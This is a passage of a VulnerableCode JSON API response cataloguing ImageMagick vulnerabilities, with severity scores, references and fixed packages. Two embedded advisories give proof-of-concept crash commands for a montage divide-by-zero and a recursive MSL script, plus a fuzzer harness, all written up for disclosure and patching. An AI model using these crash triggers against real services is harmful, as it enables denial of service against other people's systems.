"http://public2.vulnerablecode.io/vulnerabilities/VCID-utfe-h3b7-jqcj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/351741?format=api", "vulnerability_id": "VCID-uvkp-1zss-57gr", "summary": "ImageMagick: Magick.NET: ImageMagick: Denial of Service via deeply nested XML file processing", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33908.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33908.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33908", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.0495", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04914", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.12451", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00044", "scoring_system": "epss", "scoring_elements": "0.13268", "published_at": "2026-04-18T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33908" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33908", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33908" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:29:51Z/" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/ccdc01180276aa2cb3d4a32a611aa4f417061cd8", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:29:51Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/ccdc01180276aa2cb3d4a32a611aa4f417061cd8" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:29:51Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458041", "reference_id": "2458041", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458041" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33908", "reference_id": "CVE-2026-33908", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33908" }, { "reference_url": "https://github.com/advisories/GHSA-fwvm-ggf6-2p4x", "reference_id": "GHSA-fwvm-ggf6-2p4x", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-fwvm-ggf6-2p4x" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-fwvm-ggf6-2p4x", "reference_id": "GHSA-fwvm-ggf6-2p4x", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:29:51Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-fwvm-ggf6-2p4x" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1068118?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u8" }, { "url": "http://public2.vulnerablecode.io/api/packages/1054646?format=api", "purl": "pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068084?format=api", "purl": "pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1" } ], "aliases": [ "CVE-2026-33908", "GHSA-fwvm-ggf6-2p4x" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-uvkp-1zss-57gr" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/28862?format=api", "vulnerability_id": "VCID-uwj5-1fkf-7qg9", "summary": "ImageMagick affected by divide-by-zero in ThumbnailImage via montage -geometry \":\" leads to crash\n## Summary\nPassing a geometry string containing only a colon (\":\") to montage -geometry leads GetGeometry() to set width/height to 0. Later, ThumbnailImage() divides by these zero dimensions, triggering a crash (SIGFPE/abort), resulting in a denial of service.\n\n## Details\n**Root Cause**\n1. `montage -geometry \":\" ...` reaches `MagickCore/geometry.c:GetGeometry().`\n2. `StringToDouble/InterpretLocaleValue` parses `\":\"` as `0.0;` then: \nhttps://github.com/ImageMagick/ImageMagick/blob/0ba1b587be17543b664f7ad538e9e51e0da59d17/MagickCore/geometry.c#L355\n`WidthValue` (and/or `HeightValue)` is set with a zero dimension.\n3. In MagickCore/resize.c:ThumbnailImage(), the code computes:\nhttps://github.com/ImageMagick/ImageMagick/blob/0ba1b587be17543b664f7ad538e9e51e0da59d17/MagickCore/resize.c#L4625-L4629\ncausing a division by zero and immediate crash.\n\nThe issue is trivially triggerable without external input files (e.g., using `xc:white`).\n\n### Reproduction\nEnvironment\n```\nVersion: ImageMagick 7.1.2-1 (Beta) Q16-HDRI x86_64 0ba1b587b:20250812 https://imagemagick.org\nFeatures: Cipher DPC HDRI\nDelegates (built-in): bzlib fontconfig freetype jbig jng jpeg lcms lzma pangocairo png tiff x xml zlib\nCompiler: clang (14.0.0)\nOS/Arch: Linux x86_64\n```\nSteps\n```\n./bin/magick montage -geometry : xc:white null:\n```\nObserved result\n```\nIOT instruction (core dumped)\n# (Environment-dependent: SIGFPE/abort may be observed.)\n```\n\n## PoC\nNo external file required; the pseudo image xc:white suffices:\n```\n./bin/magick montage -geometry : xc:white null:\n```\n\n## Impact\n- **Denial of Service:** A divide-by-zero in `ThumbnailImage()` causes immediate abnormal termination (e.g., SIGFPE/abort), crashing the ImageMagick process.\n\n\n## Suggested fix\nDefensively reject zero dimensions early in `ThumbnailImage()`:\n```c\nif ((columns == 0) || (rows == 0)) {\n (void) ThrowMagickException(exception, GetMagickModule(), OptionError,\n \"InvalidGeometry\", \"thumbnail requires non-zero dimensions: %.20gx%.20g\",\n (double) columns, (double) rows);\n return (Image *) NULL;\n}\n```\nAdditionally, consider tightening validation in `GetGeometry()` so that colon-only (and similar malformed) inputs do not yield `WidthValue/HeightValue` with zero, or are rejected outright. Variants like `\"x:\"` or `\":x\"` may also need explicit handling (maintainer confirmation requested).\n\n## Credits\n### Team Daemon Fuzz Hunters\n**Bug Hunting Master Program, HSpace/Findthegap**\n<br>\n\n**Woojin Park**\n@jin-156\n[1203kids@gmail.com](mailto:1203kids@gmail.com)\n\n**Hojun Lee**\n@leehohojune \n[leehojune@korea.ac.kr](mailto:leehojune@korea.ac.kr)\n\n**Youngin Won**\n@amethyst0225\n[youngin04@korea.ac.kr](mailto:youngin04@korea.ac.kr)\n\n**Siyeon Han**\n@hanbunny\n[kokosyeon@gmail.com](mailto:kokosyeon@gmail.com)", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-55212.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-55212.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-55212", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00284", "scoring_system": "epss", "scoring_elements": "0.51821", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00284", "scoring_system": "epss", "scoring_elements": "0.51788", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00284", "scoring_system": "epss", "scoring_elements": "0.51813", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00284", "scoring_system": "epss", "scoring_elements": "0.51775", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00284", "scoring_system": "epss", "scoring_elements": "0.51829", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00284", "scoring_system": "epss", "scoring_elements": "0.51827", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00284", "scoring_system": "epss", "scoring_elements": "0.51878", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00284", "scoring_system": "epss", "scoring_elements": "0.51858", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00284", "scoring_system": "epss", "scoring_elements": "0.51843", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00284", "scoring_system": "epss", "scoring_elements": "0.51885", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00284", "scoring_system": "epss", "scoring_elements": "0.51892", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00284", "scoring_system": "epss", "scoring_elements": "0.51873", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-55212" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-55212", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-55212" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.8.1", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-26T19:36:13Z/" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.8.1" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/blob/0ba1b587be17543b664f7ad538e9e51e0da59d17/MagickCore/geometry.c#L355", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-26T19:36:13Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/blob/0ba1b587be17543b664f7ad538e9e51e0da59d17/MagickCore/geometry.c#L355" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/blob/0ba1b587be17543b664f7ad538e9e51e0da59d17/MagickCore/resize.c#L4625-L4629", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-26T19:36:13Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/blob/0ba1b587be17543b664f7ad538e9e51e0da59d17/MagickCore/resize.c#L4625-L4629" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/5f0bcf986b8b5e90567750d31a37af502b73f2af", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-26T19:36:13Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/5f0bcf986b8b5e90567750d31a37af502b73f2af" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-fh55-q5pj-pxgw", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-26T19:36:13Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-fh55-q5pj-pxgw" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55212", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55212" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1111587", "reference_id": "1111587", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1111587" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2391088", "reference_id": "2391088", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2391088" }, { "reference_url": "https://github.com/advisories/GHSA-fh55-q5pj-pxgw", "reference_id": "GHSA-fh55-q5pj-pxgw", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-fh55-q5pj-pxgw" }, { "reference_url": "https://usn.ubuntu.com/7756-1/", "reference_id": "USN-7756-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7756-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2025-55212", "GHSA-fh55-q5pj-pxgw" ], "risk_score": 1.6, "exploitability": "0.5", "weighted_severity": "3.3", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-uwj5-1fkf-7qg9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/20141?format=api", "vulnerability_id": "VCID-vaks-d4k5-zue7", "summary": "ImageMagick MSL: Stack overflow via infinite recursion in ProcessMSLScript\n## Summary\n\nStack overflow via infinite recursion in MSL (Magick Scripting Language) `<write>` command when writing to MSL format.\n\n## Version\n\n- ImageMagick 7.x (tested on current main branch)\n- Commit: HEAD\n- Requires: libxml2 support (for MSL parsing)\n\n## Steps to Reproduce\n\n### Method 1: Using ImageMagick directly\n\n```bash\nmagick MSL:recursive.msl out.png\n```\n\n### Method 2: Using OSS-Fuzz reproduce\n\n```bash\npython3 infra/helper.py build_fuzzers imagemagick\npython3 infra/helper.py reproduce imagemagick msl_fuzzer recursive.msl\n```\n\nOr run the fuzzer directly:\n```bash\n./msl_fuzzer recursive.msl\n```\n\n## Expected Behavior\n\nImageMagick should handle recursive MSL references gracefully by detecting the loop and returning an error.\n\n## Actual Behavior\n\nStack overflow causes process crash:\n\n```\nAddressSanitizer:DEADLYSIGNAL\n==PID==ERROR: AddressSanitizer: stack-overflow\n #0 MSLStartElement /src/imagemagick/coders/msl.c:7045\n #1 xmlParseStartTag /src/libxml2/parser.c\n #2 xmlParseChunk /src/libxml2/parser.c:11273\n #3 ProcessMSLScript /src/imagemagick/coders/msl.c:7405\n #4 WriteMSLImage /src/imagemagick/coders/msl.c:7867\n #5 WriteImage /src/imagemagick/MagickCore/constitute.c:1346\n #6 MSLStartElement /src/imagemagick/coders/msl.c:7045\n ... (infinite recursion, 287+ frames)\n```\n\n## Root Cause Analysis\n\nIn `coders/msl.c`, the `<write>` command handler in `MSLStartElement()` (line ~7045) calls `WriteImage()`. When the output filename specifies MSL format (`msl:filename`), `WriteMSLImage()` is called, which parses the MSL file again via `ProcessMSLScript()`.\n\nIf the MSL file references itself (directly or indirectly), this creates an infinite recursion loop:\n\n```\nMSLStartElement() → WriteImage() → WriteMSLImage() → ProcessMSLScript()\n → xmlParseChunk() → MSLStartElement() → ... (infinite loop)\n```\n\n## Impact\n\n- **DoS**: Guaranteed crash via stack exhaustion\n- **Affected**: Any application using ImageMagick to process user-supplied MSL files\n\n## Additional Trigger Paths\n\nThe `<read>` command can also trigger recursion:\n\nIndirect recursion is also possible (a.msl → b.msl → a.msl).\n\n## Fuzzer\n\nThis issue was discovered using a custom MSL fuzzer:\n\n```cpp\n#include <cstdint>\n#include <Magick++/Blob.h>\n#include <Magick++/Image.h>\n#include \"utils.cc\"\n\nextern \"C\" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size)\n{\n if (IsInvalidSize(Size))\n return(0);\n try\n {\n const Magick::Blob blob(Data, Size);\n Magick::Image image;\n image.magick(\"MSL\");\n image.fileName(\"MSL:\");\n image.read(blob);\n }\n catch (Magick::Exception)\n {\n }\n return(0);\n}\n```\n\nThis issue was found by Team FuzzingBrain @ Texas A&M University", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23874.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23874.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-23874", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05225", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05051", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.0508", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05101", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05134", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.0515", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05125", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05108", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05093", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05041", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05046", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05194", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-23874" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23874", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23874" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.2", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.2" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-9vj4-wc7r-p844", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-20T21:37:11Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-9vj4-wc7r-p844" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23874", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23874" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1126075", "reference_id": "1126075", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1126075" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431034", "reference_id": "2431034", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431034" }, { "reference_url": "https://github.com/advisories/GHSA-9vj4-wc7r-p844", "reference_id": "GHSA-9vj4-wc7r-p844", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9vj4-wc7r-p844" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": 